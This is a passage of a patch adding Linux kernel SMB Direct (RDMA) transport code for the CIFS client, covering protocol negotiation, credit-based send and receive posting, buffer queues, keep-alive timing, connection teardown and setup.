++	return ERR_PTR(rc);
++}
++
++/*
++ * Test if FRWR (Fast Registration Work Requests) is supported on the device
++ * This implementation requries FRWR on RDMA read/write
++ * return value: true if it is supported
++ */
++static bool frwr_is_supported(struct ib_device_attr *attrs)
++{
++	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
++		return false;
++	if (attrs->max_fast_reg_page_list_len == 0)
++		return false;
++	return true;
++}
++
++static int smbd_ia_open(
++		struct smbd_connection *info,
++		struct sockaddr *dstaddr, int port)
++{
++	int rc;
++
++	info->id = smbd_create_id(info, dstaddr, port);
++	if (IS_ERR(info->id)) {
++		rc = PTR_ERR(info->id);
++		goto out1;
++	}
++
++	if (!frwr_is_supported(&info->id->device->attrs)) {
++		log_rdma_event(ERR, "Fast Registration Work Requests (FRWR) is not supported\n");
++		log_rdma_event(ERR, "Device capability flags = %llx max_fast_reg_page_list_len = %u\n",
++			       info->id->device->attrs.device_cap_flags,
++			       info->id->device->attrs.max_fast_reg_page_list_len);
++		rc = -EPROTONOSUPPORT;
++		goto out2;
++	}
++	info->max_frmr_depth = min_t(int,
++		smbd_max_frmr_depth,
++		info->id->device->attrs.max_fast_reg_page_list_len);
++	info->mr_type = IB_MR_TYPE_MEM_REG;
++	if (info->id->device->attrs.kernel_cap_flags & IBK_SG_GAPS_REG)
++		info->mr_type = IB_MR_TYPE_SG_GAPS;
++
++	info->pd = ib_alloc_pd(info->id->device, 0);
++	if (IS_ERR(info->pd)) {
++		rc = PTR_ERR(info->pd);
++		log_rdma_event(ERR, "ib_alloc_pd() returned %d\n", rc);
++		goto out2;
++	}
++
++	return 0;
++
++out2:
++	rdma_destroy_id(info->id);
++	info->id = NULL;
++
++out1:
++	return rc;
++}
++
++/*
++ * Send a negotiation request message to the peer
++ * The negotiation procedure is in [MS-SMBD] 3.1.5.2 and 3.1.5.3
++ * After negotiation, the transport is connected and ready for
++ * carrying upper layer SMB payload
++ */
++static int smbd_post_send_negotiate_req(struct smbd_connection *info)
++{
++	struct ib_send_wr send_wr;
++	int rc = -ENOMEM;
++	struct smbd_request *request;
++	struct smbd_negotiate_req *packet;
++
++	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
++	if (!request)
++		return rc;
++
++	request->info = info;
++
++	packet = smbd_request_payload(request);
++	packet->min_version = cpu_to_le16(SMBD_V1);
++	packet->max_version = cpu_to_le16(SMBD_V1);
++	packet->reserved = 0;
++	packet->credits_requested = cpu_to_le16(info->send_credit_target);
++	packet->preferred_send_size = cpu_to_le32(info->max_send_size);
++	packet->max_receive_size = cpu_to_le32(info->max_receive_size);
++	packet->max_fragmented_size =
++		cpu_to_le32(info->max_fragmented_recv_size);
++
++	request->num_sge = 1;
++	request->sge[0].addr = ib_dma_map_single(
++				info->id->device, (void *)packet,
++				sizeof(*packet), DMA_TO_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
++		rc = -EIO;
++		goto dma_mapping_failed;
++	}
++
++	request->sge[0].length = sizeof(*packet);
++	request->sge[0].lkey = info->pd->local_dma_lkey;
++
++	ib_dma_sync_single_for_device(
++		info->id->device, request->sge[0].addr,
++		request->sge[0].length, DMA_TO_DEVICE);
++
++	request->cqe.done = send_done;
++
++	send_wr.next = NULL;
++	send_wr.wr_cqe = &request->cqe;
++	send_wr.sg_list = request->sge;
++	send_wr.num_sge = request->num_sge;
++	send_wr.opcode = IB_WR_SEND;
++	send_wr.send_flags = IB_SEND_SIGNALED;
++
++	log_rdma_send(INFO, "sge addr=0x%llx length=%u lkey=0x%x\n",
++		request->sge[0].addr,
++		request->sge[0].length, request->sge[0].lkey);
++
++	atomic_inc(&info->send_pending);
++	rc = ib_post_send(info->id->qp, &send_wr, NULL);
++	if (!rc)
++		return 0;
++
++	/* if we reach here, post send failed */
++	log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
++	atomic_dec(&info->send_pending);
++	ib_dma_unmap_single(info->id->device, request->sge[0].addr,
++		request->sge[0].length, DMA_TO_DEVICE);
++
++	smbd_disconnect_rdma_connection(info);
++
++dma_mapping_failed:
++	mempool_free(request, info->request_mempool);
++	return rc;
++}
++
++/*
++ * Extend the credits to remote peer
++ * This implements [MS-SMBD] 3.1.5.9
++ * The idea is that we should extend credits to remote peer as quickly as
++ * it's allowed, to maintain data flow. We allocate as much receive
++ * buffer as possible, and extend the receive credits to remote peer
++ * return value: the new credtis being granted.
++ */
++static int manage_credits_prior_sending(struct smbd_connection *info)
++{
++	int new_credits;
++
++	spin_lock(&info->lock_new_credits_offered);
++	new_credits = info->new_credits_offered;
++	info->new_credits_offered = 0;
++	spin_unlock(&info->lock_new_credits_offered);
++
++	return new_credits;
++}
++
++/*
++ * Check if we need to send a KEEP_ALIVE message
++ * The idle connection timer triggers a KEEP_ALIVE message when expires
++ * SMB_DIRECT_RESPONSE_REQUESTED is set in the message flag to have peer send
++ * back a response.
++ * return value:
++ * 1 if SMB_DIRECT_RESPONSE_REQUESTED needs to be set
++ * 0: otherwise
++ */
++static int manage_keep_alive_before_sending(struct smbd_connection *info)
++{
++	if (info->keep_alive_requested == KEEP_ALIVE_PENDING) {
++		info->keep_alive_requested = KEEP_ALIVE_SENT;
++		return 1;
++	}
++	return 0;
++}
++
++/* Post the send request */
++static int smbd_post_send(struct smbd_connection *info,
++		struct smbd_request *request)
++{
++	struct ib_send_wr send_wr;
++	int rc, i;
++
++	for (i = 0; i < request->num_sge; i++) {
++		log_rdma_send(INFO,
++			"rdma_request sge[%d] addr=0x%llx length=%u\n",
++			i, request->sge[i].addr, request->sge[i].length);
++		ib_dma_sync_single_for_device(
++			info->id->device,
++			request->sge[i].addr,
++			request->sge[i].length,
++			DMA_TO_DEVICE);
++	}
++
++	request->cqe.done = send_done;
++
++	send_wr.next = NULL;
++	send_wr.wr_cqe = &request->cqe;
++	send_wr.sg_list = request->sge;
++	send_wr.num_sge = request->num_sge;
++	send_wr.opcode = IB_WR_SEND;
++	send_wr.send_flags = IB_SEND_SIGNALED;
++
++	rc = ib_post_send(info->id->qp, &send_wr, NULL);
++	if (rc) {
++		log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
++		smbd_disconnect_rdma_connection(info);
++		rc = -EAGAIN;
++	} else
++		/* Reset timer for idle connection after packet is sent */
++		mod_delayed_work(info->workqueue, &info->idle_timer_work,
++			info->keep_alive_interval*HZ);
++
++	return rc;
++}
++
++static int smbd_post_send_sgl(struct smbd_connection *info,
++	struct scatterlist *sgl, int data_length, int remaining_data_length)
++{
++	int num_sgs;
++	int i, rc;
++	int header_length;
++	struct smbd_request *request;
++	struct smbd_data_transfer *packet;
++	int new_credits;
++	struct scatterlist *sg;
++
++wait_credit:
++	/* Wait for send credits. A SMBD packet needs one credit */
++	rc = wait_event_interruptible(info->wait_send_queue,
++		atomic_read(&info->send_credits) > 0 ||
++		info->transport_status != SMBD_CONNECTED);
++	if (rc)
++		goto err_wait_credit;
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_outgoing(ERR, "disconnected not sending on wait_credit\n");
++		rc = -EAGAIN;
++		goto err_wait_credit;
++	}
++	if (unlikely(atomic_dec_return(&info->send_credits) < 0)) {
++		atomic_inc(&info->send_credits);
++		goto wait_credit;
++	}
++
++wait_send_queue:
++	wait_event(info->wait_post_send,
++		atomic_read(&info->send_pending) < info->send_credit_target ||
++		info->transport_status != SMBD_CONNECTED);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_outgoing(ERR, "disconnected not sending on wait_send_queue\n");
++		rc = -EAGAIN;
++		goto err_wait_send_queue;
++	}
++
++	if (unlikely(atomic_inc_return(&info->send_pending) >
++				info->send_credit_target)) {
++		atomic_dec(&info->send_pending);
++		goto wait_send_queue;
++	}
++
++	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
++	if (!request) {
++		rc = -ENOMEM;
++		goto err_alloc;
++	}
++
++	request->info = info;
++
++	/* Fill in the packet header */
++	packet = smbd_request_payload(request);
++	packet->credits_requested = cpu_to_le16(info->send_credit_target);
++
++	new_credits = manage_credits_prior_sending(info);
++	atomic_add(new_credits, &info->receive_credits);
++	packet->credits_granted = cpu_to_le16(new_credits);
++
++	info->send_immediate = false;
++
++	packet->flags = 0;
++	if (manage_keep_alive_before_sending(info))
++		packet->flags |= cpu_to_le16(SMB_DIRECT_RESPONSE_REQUESTED);
++
++	packet->reserved = 0;
++	if (!data_length)
++		packet->data_offset = 0;
++	else
++		packet->data_offset = cpu_to_le32(24);
++	packet->data_length = cpu_to_le32(data_length);
++	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
++	packet->padding = 0;
++
++	log_outgoing(INFO, "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
++		     le16_to_cpu(packet->credits_requested),
++		     le16_to_cpu(packet->credits_granted),
++		     le32_to_cpu(packet->data_offset),
++		     le32_to_cpu(packet->data_length),
++		     le32_to_cpu(packet->remaining_data_length));
++
++	/* Map the packet to DMA */
++	header_length = sizeof(struct smbd_data_transfer);
++	/* If this is a packet without payload, don't send padding */
++	if (!data_length)
++		header_length = offsetof(struct smbd_data_transfer, padding);
++
++	request->num_sge = 1;
++	request->sge[0].addr = ib_dma_map_single(info->id->device,
++						 (void *)packet,
++						 header_length,
++						 DMA_TO_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
++		rc = -EIO;
++		request->sge[0].addr = 0;
++		goto err_dma;
++	}
++
++	request->sge[0].length = header_length;
++	request->sge[0].lkey = info->pd->local_dma_lkey;
++
++	/* Fill in the packet data payload */
++	num_sgs = sgl ? sg_nents(sgl) : 0;
++	for_each_sg(sgl, sg, num_sgs, i) {
++		request->sge[i+1].addr =
++			ib_dma_map_page(info->id->device, sg_page(sg),
++			       sg->offset, sg->length, DMA_TO_DEVICE);
++		if (ib_dma_mapping_error(
++				info->id->device, request->sge[i+1].addr)) {
++			rc = -EIO;
++			request->sge[i+1].addr = 0;
++			goto err_dma;
++		}
++		request->sge[i+1].length = sg->length;
++		request->sge[i+1].lkey = info->pd->local_dma_lkey;
++		request->num_sge++;
++	}
++
++	rc = smbd_post_send(info, request);
++	if (!rc)
++		return 0;
++
++err_dma:
++	for (i = 0; i < request->num_sge; i++)
++		if (request->sge[i].addr)
++			ib_dma_unmap_single(info->id->device,
++					    request->sge[i].addr,
++					    request->sge[i].length,
++					    DMA_TO_DEVICE);
++	mempool_free(request, info->request_mempool);
++
++	/* roll back receive credits and credits to be offered */
++	spin_lock(&info->lock_new_credits_offered);
++	info->new_credits_offered += new_credits;
++	spin_unlock(&info->lock_new_credits_offered);
++	atomic_sub(new_credits, &info->receive_credits);
++
++err_alloc:
++	if (atomic_dec_and_test(&info->send_pending))
++		wake_up(&info->wait_send_pending);
++
++err_wait_send_queue:
++	/* roll back send credits and pending */
++	atomic_inc(&info->send_credits);
++
++err_wait_credit:
++	return rc;
++}
++
++/*
++ * Send a page
++ * page: the page to send
++ * offset: offset in the page to send
++ * size: length in the page to send
++ * remaining_data_length: remaining data to send in this payload
++ */
++static int smbd_post_send_page(struct smbd_connection *info, struct page *page,
++		unsigned long offset, size_t size, int remaining_data_length)
++{
++	struct scatterlist sgl;
++
++	sg_init_table(&sgl, 1);
++	sg_set_page(&sgl, page, size, offset);
++
++	return smbd_post_send_sgl(info, &sgl, size, remaining_data_length);
++}
++
++/*
++ * Send an empty message
++ * Empty message is used to extend credits to peer to for keep live
++ * while there is no upper layer payload to send at the time
++ */
++static int smbd_post_send_empty(struct smbd_connection *info)
++{
++	info->count_send_empty++;
++	return smbd_post_send_sgl(info, NULL, 0, 0);
++}
++
++/*
++ * Send a data buffer
++ * iov: the iov array describing the data buffers
++ * n_vec: number of iov array
++ * remaining_data_length: remaining data to send following this packet
++ * in segmented SMBD packet
++ */
++static int smbd_post_send_data(
++	struct smbd_connection *info, struct kvec *iov, int n_vec,
++	int remaining_data_length)
++{
++	int i;
++	u32 data_length = 0;
++	struct scatterlist sgl[SMBDIRECT_MAX_SEND_SGE - 1];
++
++	if (n_vec > SMBDIRECT_MAX_SEND_SGE - 1) {
++		cifs_dbg(VFS, "Can't fit data to SGL, n_vec=%d\n", n_vec);
++		return -EINVAL;
++	}
++
++	sg_init_table(sgl, n_vec);
++	for (i = 0; i < n_vec; i++) {
++		data_length += iov[i].iov_len;
++		sg_set_buf(&sgl[i], iov[i].iov_base, iov[i].iov_len);
++	}
++
++	return smbd_post_send_sgl(info, sgl, data_length, remaining_data_length);
++}
++
++/*
++ * Post a receive request to the transport
++ * The remote peer can only send data when a receive request is posted
++ * The interaction is controlled by send/receive credit system
++ */
++static int smbd_post_recv(
++		struct smbd_connection *info, struct smbd_response *response)
++{
++	struct ib_recv_wr recv_wr;
++	int rc = -EIO;
++
++	response->sge.addr = ib_dma_map_single(
++				info->id->device, response->packet,
++				info->max_receive_size, DMA_FROM_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, response->sge.addr))
++		return rc;
++
++	response->sge.length = info->max_receive_size;
++	response->sge.lkey = info->pd->local_dma_lkey;
++
++	response->cqe.done = recv_done;
++
++	recv_wr.wr_cqe = &response->cqe;
++	recv_wr.next = NULL;
++	recv_wr.sg_list = &response->sge;
++	recv_wr.num_sge = 1;
++
++	rc = ib_post_recv(info->id->qp, &recv_wr, NULL);
++	if (rc) {
++		ib_dma_unmap_single(info->id->device, response->sge.addr,
++				    response->sge.length, DMA_FROM_DEVICE);
++		smbd_disconnect_rdma_connection(info);
++		log_rdma_recv(ERR, "ib_post_recv failed rc=%d\n", rc);
++	}
++
++	return rc;
++}
++
++/* Perform SMBD negotiate according to [MS-SMBD] 3.1.5.2 */
++static int smbd_negotiate(struct smbd_connection *info)
++{
++	int rc;
++	struct smbd_response *response = get_receive_buffer(info);
++
++	response->type = SMBD_NEGOTIATE_RESP;
++	rc = smbd_post_recv(info, response);
++	log_rdma_event(INFO, "smbd_post_recv rc=%d iov.addr=0x%llx iov.length=%u iov.lkey=0x%x\n",
++		       rc, response->sge.addr,
++		       response->sge.length, response->sge.lkey);
++	if (rc)
++		return rc;
++
++	init_completion(&info->negotiate_completion);
++	info->negotiate_done = false;
++	rc = smbd_post_send_negotiate_req(info);
++	if (rc)
++		return rc;
++
++	rc = wait_for_completion_interruptible_timeout(
++		&info->negotiate_completion, SMBD_NEGOTIATE_TIMEOUT * HZ);
++	log_rdma_event(INFO, "wait_for_completion_timeout rc=%d\n", rc);
++
++	if (info->negotiate_done)
++		return 0;
++
++	if (rc == 0)
++		rc = -ETIMEDOUT;
++	else if (rc == -ERESTARTSYS)
++		rc = -EINTR;
++	else
++		rc = -ENOTCONN;
++
++	return rc;
++}
++
++static void put_empty_packet(
++		struct smbd_connection *info, struct smbd_response *response)
++{
++	spin_lock(&info->empty_packet_queue_lock);
++	list_add_tail(&response->list, &info->empty_packet_queue);
++	info->count_empty_packet_queue++;
++	spin_unlock(&info->empty_packet_queue_lock);
++
++	queue_work(info->workqueue, &info->post_send_credits_work);
++}
++
++/*
++ * Implement Connection.FragmentReassemblyBuffer defined in [MS-SMBD] 3.1.1.1
++ * This is a queue for reassembling upper layer payload and present to upper
++ * layer. All the inncoming payload go to the reassembly queue, regardless of
++ * if reassembly is required. The uuper layer code reads from the queue for all
++ * incoming payloads.
++ * Put a received packet to the reassembly queue
++ * response: the packet received
++ * data_length: the size of payload in this packet
++ */
++static void enqueue_reassembly(
++	struct smbd_connection *info,
++	struct smbd_response *response,
++	int data_length)
++{
++	spin_lock(&info->reassembly_queue_lock);
++	list_add_tail(&response->list, &info->reassembly_queue);
++	info->reassembly_queue_length++;
++	/*
++	 * Make sure reassembly_data_length is updated after list and
++	 * reassembly_queue_length are updated. On the dequeue side
++	 * reassembly_data_length is checked without a lock to determine
++	 * if reassembly_queue_length and list is up to date
++	 */
++	virt_wmb();
++	info->reassembly_data_length += data_length;
++	spin_unlock(&info->reassembly_queue_lock);
++	info->count_reassembly_queue++;
++	info->count_enqueue_reassembly_queue++;
++}
++
++/*
++ * Get the first entry at the front of reassembly queue
++ * Caller is responsible for locking
++ * return value: the first entry if any, NULL if queue is empty
++ */
++static struct smbd_response *_get_first_reassembly(struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++
++	if (!list_empty(&info->reassembly_queue)) {
++		ret = list_first_entry(
++			&info->reassembly_queue,
++			struct smbd_response, list);
++	}
++	return ret;
++}
++
++static struct smbd_response *get_empty_queue_buffer(
++		struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++	unsigned long flags;
++
++	spin_lock_irqsave(&info->empty_packet_queue_lock, flags);
++	if (!list_empty(&info->empty_packet_queue)) {
++		ret = list_first_entry(
++			&info->empty_packet_queue,
++			struct smbd_response, list);
++		list_del(&ret->list);
++		info->count_empty_packet_queue--;
++	}
++	spin_unlock_irqrestore(&info->empty_packet_queue_lock, flags);
++
++	return ret;
++}
++
++/*
++ * Get a receive buffer
++ * For each remote send, we need to post a receive. The receive buffers are
++ * pre-allocated in advance.
++ * return value: the receive buffer, NULL if none is available
++ */
++static struct smbd_response *get_receive_buffer(struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++	unsigned long flags;
++
++	spin_lock_irqsave(&info->receive_queue_lock, flags);
++	if (!list_empty(&info->receive_queue)) {
++		ret = list_first_entry(
++			&info->receive_queue,
++			struct smbd_response, list);
++		list_del(&ret->list);
++		info->count_receive_queue--;
++		info->count_get_receive_buffer++;
++	}
++	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
++
++	return ret;
++}
++
++/*
++ * Return a receive buffer
++ * Upon returning of a receive buffer, we can post new receive and extend
++ * more receive credits to remote peer. This is done immediately after a
++ * receive buffer is returned.
++ */
++static void put_receive_buffer(
++	struct smbd_connection *info, struct smbd_response *response)
++{
++	unsigned long flags;
++
++	ib_dma_unmap_single(info->id->device, response->sge.addr,
++		response->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock_irqsave(&info->receive_queue_lock, flags);
++	list_add_tail(&response->list, &info->receive_queue);
++	info->count_receive_queue++;
++	info->count_put_receive_buffer++;
++	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
++
++	queue_work(info->workqueue, &info->post_send_credits_work);
++}
++
++/* Preallocate all receive buffer on transport establishment */
++static int allocate_receive_buffers(struct smbd_connection *info, int num_buf)
++{
++	int i;
++	struct smbd_response *response;
++
++	INIT_LIST_HEAD(&info->reassembly_queue);
++	spin_lock_init(&info->reassembly_queue_lock);
++	info->reassembly_data_length = 0;
++	info->reassembly_queue_length = 0;
++
++	INIT_LIST_HEAD(&info->receive_queue);
++	spin_lock_init(&info->receive_queue_lock);
++	info->count_receive_queue = 0;
++
++	INIT_LIST_HEAD(&info->empty_packet_queue);
++	spin_lock_init(&info->empty_packet_queue_lock);
++	info->count_empty_packet_queue = 0;
++
++	init_waitqueue_head(&info->wait_receive_queues);
++
++	for (i = 0; i < num_buf; i++) {
++		response = mempool_alloc(info->response_mempool, GFP_KERNEL);
++		if (!response)
++			goto allocate_failed;
++
++		response->info = info;
++		list_add_tail(&response->list, &info->receive_queue);
++		info->count_receive_queue++;
++	}
++
++	return 0;
++
++allocate_failed:
++	while (!list_empty(&info->receive_queue)) {
++		response = list_first_entry(
++				&info->receive_queue,
++				struct smbd_response, list);
++		list_del(&response->list);
++		info->count_receive_queue--;
++
++		mempool_free(response, info->response_mempool);
++	}
++	return -ENOMEM;
++}
++
++static void destroy_receive_buffers(struct smbd_connection *info)
++{
++	struct smbd_response *response;
++
++	while ((response = get_receive_buffer(info)))
++		mempool_free(response, info->response_mempool);
++
++	while ((response = get_empty_queue_buffer(info)))
++		mempool_free(response, info->response_mempool);
++}
++
++/* Implement idle connection timer [MS-SMBD] 3.1.6.2 */
++static void idle_connection_timer(struct work_struct *work)
++{
++	struct smbd_connection *info = container_of(
++					work, struct smbd_connection,
++					idle_timer_work.work);
++
++	if (info->keep_alive_requested != KEEP_ALIVE_NONE) {
++		log_keep_alive(ERR,
++			"error status info->keep_alive_requested=%d\n",
++			info->keep_alive_requested);
++		smbd_disconnect_rdma_connection(info);
++		return;
++	}
++
++	log_keep_alive(INFO, "about to send an empty idle message\n");
++	smbd_post_send_empty(info);
++
++	/* Setup the next idle timeout work */
++	queue_delayed_work(info->workqueue, &info->idle_timer_work,
++			info->keep_alive_interval*HZ);
++}
++
++/*
++ * Destroy the transport and related RDMA and memory resources
++ * Need to go through all the pending counters and make sure on one is using
++ * the transport while it is destroyed
++ */
++void smbd_destroy(struct TCP_Server_Info *server)
++{
++	struct smbd_connection *info = server->smbd_conn;
++	struct smbd_response *response;
++	unsigned long flags;
++
++	if (!info) {
++		log_rdma_event(INFO, "rdma session already destroyed\n");
++		return;
++	}
++
++	log_rdma_event(INFO, "destroying rdma session\n");
++	if (info->transport_status != SMBD_DISCONNECTED) {
++		rdma_disconnect(server->smbd_conn->id);
++		log_rdma_event(INFO, "wait for transport being disconnected\n");
++		wait_event_interruptible(
++			info->disconn_wait,
++			info->transport_status == SMBD_DISCONNECTED);
++	}
++
++	log_rdma_event(INFO, "destroying qp\n");
++	ib_drain_qp(info->id->qp);
++	rdma_destroy_qp(info->id);
++
++	log_rdma_event(INFO, "cancelling idle timer\n");
++	cancel_delayed_work_sync(&info->idle_timer_work);
++
++	log_rdma_event(INFO, "wait for all send posted to IB to finish\n");
++	wait_event(info->wait_send_pending,
++		atomic_read(&info->send_pending) == 0);
++
++	/* It's not possible for upper layer to get to reassembly */
++	log_rdma_event(INFO, "drain the reassembly queue\n");
++	do {
++		spin_lock_irqsave(&info->reassembly_queue_lock, flags);
++		response = _get_first_reassembly(info);
++		if (response) {
++			list_del(&response->list);
++			spin_unlock_irqrestore(
++				&info->reassembly_queue_lock, flags);
++			put_receive_buffer(info, response);
++		} else
++			spin_unlock_irqrestore(
++				&info->reassembly_queue_lock, flags);
++	} while (response);
++	info->reassembly_data_length = 0;
++
++	log_rdma_event(INFO, "free receive buffers\n");
++	wait_event(info->wait_receive_queues,
++		info->count_receive_queue + info->count_empty_packet_queue
++			== info->receive_credit_max);
++	destroy_receive_buffers(info);
++
++	/*
++	 * For performance reasons, memory registration and deregistration
++	 * are not locked by srv_mutex. It is possible some processes are
++	 * blocked on transport srv_mutex while holding memory registration.
++	 * Release the transport srv_mutex to allow them to hit the failure
++	 * path when sending data, and then release memory registartions.
++	 */
++	log_rdma_event(INFO, "freeing mr list\n");
++	wake_up_interruptible_all(&info->wait_mr);
++	while (atomic_read(&info->mr_used_count)) {
++		cifs_server_unlock(server);
++		msleep(1000);
++		cifs_server_lock(server);
++	}
++	destroy_mr_list(info);
++
++	ib_free_cq(info->send_cq);
++	ib_free_cq(info->recv_cq);
++	ib_dealloc_pd(info->pd);
++	rdma_destroy_id(info->id);
++
++	/* free mempools */
++	mempool_destroy(info->request_mempool);
++	kmem_cache_destroy(info->request_cache);
++
++	mempool_destroy(info->response_mempool);
++	kmem_cache_destroy(info->response_cache);
++
++	info->transport_status = SMBD_DESTROYED;
++
++	destroy_workqueue(info->workqueue);
++	log_rdma_event(INFO,  "rdma session destroyed\n");
++	kfree(info);
++	server->smbd_conn = NULL;
++}
++
++/*
++ * Reconnect this SMBD connection, called from upper layer
++ * return value: 0 on success, or actual error code
++ */
++int smbd_reconnect(struct TCP_Server_Info *server)
++{
++	log_rdma_event(INFO, "reconnecting rdma session\n");
++
++	if (!server->smbd_conn) {
++		log_rdma_event(INFO, "rdma session already destroyed\n");
++		goto create_conn;
++	}
++
++	/*
++	 * This is possible if transport is disconnected and we haven't received
++	 * notification from RDMA, but upper layer has detected timeout
++	 */
++	if (server->smbd_conn->transport_status == SMBD_CONNECTED) {
++		log_rdma_event(INFO, "disconnecting transport\n");
++		smbd_destroy(server);
++	}
++
++create_conn:
++	log_rdma_event(INFO, "creating rdma session\n");
++	server->smbd_conn = smbd_get_connection(
++		server, (struct sockaddr *) &server->dstaddr);
++
++	if (server->smbd_conn)
++		cifs_dbg(VFS, "RDMA transport re-established\n");
++
++	return server->smbd_conn ? 0 : -ENOENT;
++}
++
++static void destroy_caches_and_workqueue(struct smbd_connection *info)
++{
++	destroy_receive_buffers(info);
++	destroy_workqueue(info->workqueue);
++	mempool_destroy(info->response_mempool);
++	kmem_cache_destroy(info->response_cache);
++	mempool_destroy(info->request_mempool);
++	kmem_cache_destroy(info->request_cache);
++}
++
++#define MAX_NAME_LEN	80
++static int allocate_caches_and_workqueue(struct smbd_connection *info)
++{
++	char name[MAX_NAME_LEN];
++	int rc;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_request_%p", info);
++	info->request_cache =
++		kmem_cache_create(
++			name,
++			sizeof(struct smbd_request) +
++				sizeof(struct smbd_data_transfer),
++			0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!info->request_cache)
++		return -ENOMEM;
++
++	info->request_mempool =
++		mempool_create(info->send_credit_target, mempool_alloc_slab,
++			mempool_free_slab, info->request_cache);
++	if (!info->request_mempool)
++		goto out1;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_response_%p", info);
++	info->response_cache =
++		kmem_cache_create(
++			name,
++			sizeof(struct smbd_response) +
++				info->max_receive_size,
++			0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!info->response_cache)
++		goto out2;
++
++	info->response_mempool =
++		mempool_create(info->receive_credit_max, mempool_alloc_slab,
++		       mempool_free_slab, info->response_cache);
++	if (!info->response_mempool)
++		goto out3;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_%p", info);
++	info->workqueue = create_workqueue(name);
++	if (!info->workqueue)
++		goto out4;
++
++	rc = allocate_receive_buffers(info, info->receive_credit_max);
++	if (rc) {
++		log_rdma_event(ERR, "failed to allocate receive buffers\n");
++		goto out5;
++	}
++
++	return 0;
++
++out5:
++	destroy_workqueue(info->workqueue);
++out4:
++	mempool_destroy(info->response_mempool);
++out3:
++	kmem_cache_destroy(info->response_cache);
++out2:
++	mempool_destroy(info->request_mempool);
++out1:
++	kmem_cache_destroy(info->request_cache);
++	return -ENOMEM;
++}
++
++/* Create a SMBD connection, called by upper layer */
++static struct smbd_connection *_smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr, int port)
++{
++	int rc;
++	struct smbd_connection *info;
++	struct rdma_conn_param conn_param;
++	struct ib_qp_init_attr qp_attr;
++	struct sockaddr_in *addr_in = (struct sockaddr_in *) dstaddr;
++	struct ib_port_immutable port_immutable;
++	u32 ird_ord_hdr[2];
++
++	info = kzalloc(sizeof(struct smbd_connection), GFP_KERNEL);
++	if (!info)
++		return NULL;
++
++	info->transport_status = SMBD_CONNECTING;
++	rc = smbd_ia_open(info, dstaddr, port);
++	if (rc) {
++		log_rdma_event(INFO, "smbd_ia_open rc=%d\n", rc);
++		goto create_id_failed;
++	}
++
++	if (smbd_send_credit_target > info->id->device->attrs.max_cqe ||
++	    smbd_send_credit_target > info->id->device->attrs.max_qp_wr) {
++		log_rdma_event(ERR, "consider lowering send_credit_target = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++			       smbd_send_credit_target,
++			       info->id->device->attrs.max_cqe,
++			       info->id->device->attrs.max_qp_wr);
++		goto config_failed;
++	}
++
++	if (smbd_receive_credit_max > info->id->device->attrs.max_cqe ||
++	    smbd_receive_credit_max > info->id->device->attrs.max_qp_wr) {
++		log_rdma_event(ERR, "consider lowering receive_credit_max = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++			       smbd_receive_credit_max,
++			       info->id->device->attrs.max_cqe,
++			       info->id->device->attrs.max_qp_wr);
++		goto config_failed;
++	}
++
++	info->receive_credit_max = smbd_receive_credit_max;
++	info->send_credit_target = smbd_send_credit_target;
++	info->max_send_size = smbd_max_send_size;
++	info->max_fragmented_recv_size = smbd_max_fragmented_recv_size;
++	info->max_receive_size = smbd_max_receive_size;
++	info->keep_alive_interval = smbd_keep_alive_interval;
++
++	if (info->id->device->attrs.max_send_sge < SMBDIRECT_MAX_SEND_SGE ||
++	    info->id->device->attrs.max_recv_sge < SMBDIRECT_MAX_RECV_SGE) {
++		log_rdma_event(ERR,
++			"device %.*s max_send_sge/max_recv_sge = %d/%d too small\n",
++			IB_DEVICE_NAME_MAX,
++			info->id->device->name,
++			info->id->device->attrs.max_send_sge,
++			info->id->device->attrs.max_recv_sge);
++		goto config_failed;
++	}
++
++	info->send_cq = NULL;
++	info->recv_cq = NULL;
++	info->send_cq =
++		ib_alloc_cq_any(info->id->device, info,
++				info->send_credit_target, IB_POLL_SOFTIRQ);
++	if (IS_ERR(info->send_cq)) {
++		info->send_cq = NULL;
++		goto alloc_cq_failed;
++	}
++
++	info->recv_cq =
++		ib_alloc_cq_any(info->id->device, info,
++				info->receive_credit_max, IB_POLL_SOFTIRQ);
++	if (IS_ERR(info->recv_cq)) {
++		info->recv_cq = NULL;
++		goto alloc_cq_failed;
++	}
++
++	memset(&qp_attr, 0, sizeof(qp_attr));
++	qp_attr.event_handler = smbd_qp_async_error_upcall;
++	qp_attr.qp_context = info;
++	qp_attr.cap.max_send_wr = info->send_credit_target;
++	qp_attr.cap.max_recv_wr = info->receive_credit_max;
++	qp_attr.cap.max_send_sge = SMBDIRECT_MAX_SEND_SGE;
++	qp_attr.cap.max_recv_sge = SMBDIRECT_MAX_RECV_SGE;
++	qp_attr.cap.max_inline_data = 0;
++	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
++	qp_attr.qp_type = IB_QPT_RC;
++	qp_attr.send_cq = info->send_cq;
++	qp_attr.recv_cq = info->recv_cq;
++	qp_attr.port_num = ~0;
++
++	rc = rdma_create_qp(info->id, info->pd, &qp_attr);
++	if (rc) {
